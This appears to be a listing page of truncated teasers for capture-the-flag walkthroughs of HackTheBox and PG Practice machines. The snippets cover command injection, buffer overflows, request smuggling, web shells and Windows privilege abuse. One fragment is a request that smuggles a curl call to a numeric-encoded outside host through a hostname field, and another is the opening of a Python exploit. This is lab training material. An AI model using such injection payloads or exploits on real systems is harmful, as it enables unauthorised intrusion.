We are solving Dynstr, a 30-point Linux machine on HackTheBox that involves a Dynamic DNS Service & a Command Injection. Notes Command Injection GET /nic/update?hostname=$(curl+168431223/x...

We are solving Heist from PG Practice. Heist is a really cool Windows machine that involves stealing a hash, reading a gMSA password & exploiting the SeRestorePrivilege. Links https://gith...

We are solving Kevin, an easy-rated Windows machine on PG Practice that involves a SEH Based Buffer Overflow. Notes Starting PoC #!/usr/bin/python from pwn import * from urllib import parse fr...

We are solving Sink, a 50-point Linux machine on HackTheBox that involves HTTP Request Smuggling & retrieving secrets from Localstack. Notes Reads https://nathandavison.com/blog/ha...

On a recent video someone asked a good question in the comments about why we can shutdown a box when our user has SeShutdownPrivilege listed as disabled: whoami /all ... Privilege Name ...

We are solving UT99, an intermediate windows box on PG Practice. On this box, we are going to exploit an SEH based buffer overflow. And to make it a bit more fun we’ll do that one manually instead ...

This video is about Unobtainium, a 40-point Linux machine on HackTheBox. For user, we download an electron app and proxy it through burp to find some credentials, which we can then use on an API en...

This video is about Knife, a 20-point machine on HackTheBox that involves the zerodium php backdoor and using “sudo knife” to become root.

AuthBy is a medium difficulty Windows machine on PG Practice. It involves getting FTP access to the web root of a web application and uploading a PHP web shell. For root, we’ll exploit the SeImpers...

User We start our exploration by running a full portscan: nmap -sV -sC proper.htb PORT STATE SERVICE VERSION 80/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-server-head...